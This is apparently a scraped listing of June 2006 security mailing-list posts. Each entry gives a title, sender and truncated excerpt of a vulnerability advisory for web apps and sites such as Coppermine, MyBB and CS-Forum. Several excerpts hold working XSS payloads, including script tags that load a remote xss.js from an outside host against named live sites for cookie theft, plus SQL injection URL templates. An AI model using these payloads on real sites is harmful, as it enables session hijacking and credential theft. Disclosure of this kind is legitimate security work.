Wireclub.com - XSS & cookie disclosure
2006-06-12 luny youfucktard com
Wireclub.com
Homepage: http://www.wireclub.com
Affected files: input boxes of editing a profile
XSS Vuln with no filter evasion at all: <IMG SRC=javascript:alert('XSS')>
We notice that when trying to put a url in the Open line about yourself input box, we get the msg "no urls allowe

Windows XP Task Scheduler Local Privilege Escalation (Advisory)
2006-06-12 zipk0der (zipk0der pandora-security com)
Advisory: Windows XP Task Scheduler Local Privilege Escalation
Author: Daniel Hückmann (zipk0der) zipk0der (at) pandora-security (dot) com
Released at: http://www.pandora-security.com

sorry i wrong something, this is original AWF CMS 1.11 adv
2006-06-11 Federico Fazzi (federico autistici org)
this is ok:
Advisory id: FSA:011
Author: Federico Fazzi
Date: 11/06/2006, 22:30
Synthesis: AWF CMS 1.11, Remote command execution
Type: high
Product: http://www.awf-cms.org/
Patch: unavailable

Opengaia.com - XSS Vuln & Session Include
2006-06-11 luny youfucktard com
Opengaia.com
Homepage: http://www.opengaia.com
Affected files:
my_page.php
module.php
editing your profile
the search input box
adding a diary/blog
Just like in onlinenode.com's vulnerabilities, it seems this site filters data just about the sam

[KAPDA::48]CopperminePhotoGallery1.4.8~ addhit() function~ SQLinjection attack
2006-06-11 addmimistrator gmail com
[ORIGINAL ADVISORY:] http://myimei.com/security/2006-06-11/copperminephotogallery148-addhit-function-sqlinjection-attack.html
HTTP://KAPDA.IR
??-Summary??-
Software: CPG Coppermine Photo Gallery
Software's Web Site: http://coppermine.sourceforge.net/
Versions: 1.4.8.stable
Class: Remote

Foing (manage_songs.php) Remote File Inclusion[phpBB]
2006-06-12 darkfire f4kelive zzn com
# Foing (manage_songs.php) Remote File Inclusion[phpBB]
#
# Contact : email: darkfire (at) f4kelive.zzn (dot) com & msn: darkfire (at) darkfire-br (dot) com
# Risk : High
# Class : Remote
# Script : Foing
# Version : 0.7.0 e previous
Vulne

Myscrapbook v3.1 - XSS
2006-06-11 luny youfucktard com
Myscrapbook
Homepage: http://www.pixytrix.com/myscrapbook/
Affected files: singlepage.php
Full path error with viewing most files in the txt-db-api dir:
Warning: main(API_HOME_DIRutil.php): failed to open stream: No such file or directory in

CS-Forum <= 0.81 Cross Site Scripting, SQL Injection, Full Path Disclosure
2006-06-11 gmdarkfig gmail com
Cross Site Scripting
http://[...]/read.php?msg_result=[XSS]
http://[...]/read.php?rep_titre=">[XSS]
Cookies: CSForum_nom=">[XSS]; CSForum_mail=">[XSS]; CSForum_url=">[XSS]
SQL Injection
http://[...]/read.php?id=1'[SQL_SELECT]&debut=[SQL_LIMIT]
http://[...

Wanderlist.com - XSS vuln with sessions disclosure
2006-06-11 luny youfucktard com
Wanderlist.com
Homepage: http://www.wanderlist.com
search.cgi
Search box input
adding a item to a list
Search.cgi XSS vuln with sessions disclosure:
By putting a few ending opening tags with quotes before and after, we are able to create a XSS example: ">">">'<SCRIPT SRC=http://youfucktar

tempnam() Bypass unique file name PHP 5.1.4
2006-06-11 cxib securityreason com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[tempnam() Bypass unique file name PHP 5.1.4]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 22.5.2006
- -Public: 11.6.2006
from SECURITYREASON.COM
CVE-2006-2660
- --- 0.Description ---
PHP is an HTML-embedded scripting langu

Flork.com
2006-06-10 luny youfucktard com
Flork.com
Affected files: input boxes when creating a new user
XSS Vulnerability:
We notice by adding empty tags and ending and beginning brackets we can bypass the filter of the flork.com signup. For PoC try adding either one of the below codes in as your name: ">'>'><iframe src=http://

vbulletin.com Multiple XSS Vulnerabilities
2006-06-10 chris splices org
Multiple XSS Vulnerabilities exist in vbulletin.com's website that allow the attacker to gain sensitive credentials for authenticating himself as a user on the forum and site. The first problem lies in the site's Sales Form for opening an issue ticket. Proper sanitation of variables passed v

Hotbot.com - XSS vulnerability in search engine
2006-06-10 admin majorsecurity de
Hotbot.com - XSS vulnerability
Type: Cross site scripting
Date: June, 10th 2006
Credits:
Discovered by: David "Aesthetico" Vieira-Kurz
http://www

Lycos.com - XSS vulnerability
2006-06-10 admin majorsecurity de
Lycos.com - XSS vulnerability
Type: Cross site scripting
Date: June, 10th 2006
Credits:
Discovered by: David "Aesthetico" Vieira-Kurz
http://www.

[ GLSA 200606-12 ] Mozilla Firefox: Multiple vulnerabilities
2006-06-11 Sune Kloppenborg Jeppesen (jaervosz gentoo org)

Secunia Research: MyBB "domecode()" PHP Code Execution Vulnerability
2006-06-12 Secunia Research (vuln-remove secunia com)

[ GLSA 200606-11 ] JPEG library: Denial of Service
2006-06-11 Sune Kloppenborg Jeppesen (jaervosz gentoo org)

Mydeardiary.com - XSS
2006-06-12 luny youfucktard com
Mydeardiary.com
Homepage: http://www.mydeardiary.com
Affected files:
search input boxes
Adding new diary entries
We create our XSS example by ending quotes with tags before and after: ">">">'><SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT><"<

igloo DoubleSpeak v 0.1 Multiple remote file inclusion
2006-06-11 aminrayden yahoo com
igloo DoubleSpeak v 0.1 Multiple remote file inclusion
Aria-security.com advisory
Bug Discovered by R@1D3N (amin emami)
Original Advisory: http://www.aria-security.net/advisory/igloo/doublespeak.txt
email: AminRayden (at) yahoo (dot) com
Date: 12/06/2006

Call For Papers - No cON Name 2006 Edition Spain
2006-06-11 Jose Nicolas Castellano (jncastellano noconname org)
Hello, This is for you... Thanks for reading...
No cON Name 2006 Congress === Call For Papers
<> http://www.noconname.org/congreso2006.php <>
<> September: 28th, 29th and 30th. <>
** What is

[ GLSA 200606-10 ] Cscope: Many buffer overflows
2006-06-11 Sune Kloppenborg Jeppesen (jaervosz gentoo org)
Homepage:
http://www.virtualtourist.com
Affected files:
Input boxes of your profile
search destination input box
-------------------------------------------------------
XSS vulnerability with cookie disclosure:
Under the section of "Tell others a little about y